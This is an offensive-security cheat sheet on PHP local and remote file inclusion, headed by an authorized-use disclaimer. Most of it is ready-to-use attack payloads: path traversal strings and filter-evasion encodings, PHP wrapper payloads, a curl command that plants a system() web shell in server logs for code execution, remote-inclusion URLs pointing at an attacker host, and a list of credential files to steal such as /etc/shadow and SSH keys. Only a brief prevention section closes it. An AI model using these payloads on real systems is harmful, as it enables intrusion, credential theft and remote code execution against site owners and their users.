← All cheat sheets

LFI-RFI

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Local and Remote File Inclusion: detection, path traversal, PHP wrappers
and log poisoning to RCE. Test only in-scope targets.

DETECTION#

    ?page=index.php        -> ?page=../../../../etc/passwd
    ?file=about            -> ?file=../../../../etc/passwd%00   (legacy null byte)
    # Windows
    ?page=..\..\..\..\windows\win.ini
    # Confirm read
    /etc/passwd  /etc/hosts  /proc/self/environ  C:\windows\win.ini

PATH TRAVERSAL BYPASSES#

  Encoding:
    ..%2f..%2f..%2fetc%2fpasswd
    ..%252f..%252f            # double URL-encode
    %2e%2e%2f                 # encoded dots and slash
    ..%c0%af                  # overlong UTF-8 (legacy)

  Filter evasion:
    ....//....//              # strips "../" once -> leaves "../"
    ..././..././
    /var/www/../../etc/passwd # absolute + traversal
    ..%00/                    # null truncation (old PHP)

  Path prefix/suffix forced by the app:
    # App appends ".php": use ....//, wrappers, or null byte (legacy)
    # App prepends a dir: traverse out with ../

PHP WRAPPERS#

  Read source (base64 so PHP is not executed):
    php://filter/convert.base64-encode/resource=index.php
    php://filter/read=string.rot13/resource=config.php

  Data / input wrappers (need allow_url_include / config):
    data://text/plain;base64,<base64 of <?php ... ?>>
    php://input           # POST body executed as PHP
    expect://id           # if expect extension loaded

  Zip / phar:
    zip://shell.jpg%23payload.php
    phar://uploaded.phar/x

LOG / SESSION POISONING TO RCE#

  Poison a log the app reads, then include it:
    # Send crafted User-Agent containing <?php system($_GET['c']); ?>
    curl -A '<?php system($_GET["c"]); ?>' http://target/
    # Then include the log
    ?page=/var/log/apache2/access.log&c=id
    ?page=/var/log/nginx/access.log
    ?page=/proc/self/environ            # poison via User-Agent
    ?page=/var/lib/php/sessions/sess_<PHPSESSID>

REMOTE FILE INCLUSION (RFI)#

    # Requires allow_url_include=On (rare on modern PHP)
    ?page=http://attacker/shell.txt
    ?page=\\attacker\share\shell.php     # UNC (Windows/SMB)

USEFUL TARGET FILES#

    /etc/passwd  /etc/shadow  /etc/hosts
    /proc/self/environ  /proc/self/cmdline  /proc/self/fd/N
    ~/.ssh/id_rsa  ~/.bash_history
    /var/www/html/config.php  wp-config.php  .env
    C:\windows\win.ini  C:\inetpub\wwwroot\web.config

TOOLING & WORDLISTS#

    ffuf -w lfi.txt -u 'http://t/?page=FUZZ' -fs <baseline>
    LFISuite / kadimus / liffy
    SecLists: Fuzzing/LFI/  ->  LFI-Jhaddix.txt, LFI-gracefulsecurity-*.txt

PREVENTION (blue side)#

  - Never pass user input to include/require/file APIs.
  - Allowlist filenames (map ids -> fixed paths); reject "../", null bytes.
  - Disable allow_url_include/allow_url_fopen; open_basedir.

  See also: COMMAND-INJECTION, SSRF-BYPASS, FILE upload notes in OWASP-TOP10.